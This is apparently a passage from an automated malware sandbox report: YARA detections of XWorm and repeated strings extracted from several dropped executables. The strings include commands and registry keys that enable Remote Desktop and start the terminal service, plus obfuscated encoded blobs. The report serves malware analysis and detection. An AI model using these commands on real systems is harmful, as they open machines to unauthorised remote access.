Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\d0HNrLB[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe, type: DROPPED

Yara detected XWorm

Source: Yara match	File source: 33.2.d0HNrLB.exe.353e970.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.d0HNrLB.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.d0HNrLB.exe.353e970.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000022.00000002.2463770146.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.2562200022.0000000003509000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: d0HNrLB.exe PID: 4052, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: d0HNrLB.exe PID: 4664, type: MEMORYSTR

Contains functionality to start a terminal service

Source: 1s89v4.exe	String found in binary or memory: net start termservice
Source: 1s89v4.exe, 00000002.00000003.1265730190.0000000007211000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: net start termservice
Source: 1s89v4.exe, 00000002.00000003.1265730190.0000000007211000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: 1s89v4.exe, 00000002.00000000.1260652232.0000000000FC1000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: net start termservice
Source: 1s89v4.exe, 00000002.00000000.1260652232.0000000000FC1000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: 1s89v4.exe, 00000002.00000002.1269247877.0000000000FC1000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: net start termservice
Source: 1s89v4.exe, 00000002.00000002.1269247877.0000000000FC1000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: rapes.exe	String found in binary or memory: net start termservice
Source: rapes.exe, 00000006.00000002.1270893458.00000000004C1000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: net start termservice
Source: rapes.exe, 00000006.00000002.1270893458.00000000004C1000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: rapes.exe, 00000006.00000000.1268491757.00000000004C1000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: net start termservice
Source: rapes.exe, 00000006.00000000.1268491757.00000000004C1000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: KI2Q1PIQVVVTNGJPW8.exe	String found in binary or memory: net start termservice
Source: KI2Q1PIQVVVTNGJPW8.exe, 0000000D.00000002.1583019755.0000000000441000.00000040.00000001.01000000.0000000B.sdmp	String found in binary or memory: net start termservice
Source: KI2Q1PIQVVVTNGJPW8.exe, 0000000D.00000002.1583019755.0000000000441000.00000040.00000001.01000000.0000000B.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d 